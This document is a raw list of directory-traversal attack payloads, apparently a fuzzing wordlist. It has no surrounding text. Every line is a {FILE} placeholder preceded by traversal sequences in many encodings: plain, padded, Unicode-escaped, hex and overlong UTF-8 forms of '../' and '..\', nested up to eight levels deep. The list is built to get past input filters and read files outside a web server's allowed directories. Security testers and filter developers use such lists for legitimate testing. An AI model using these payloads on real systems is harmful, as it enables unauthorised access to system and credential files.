AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
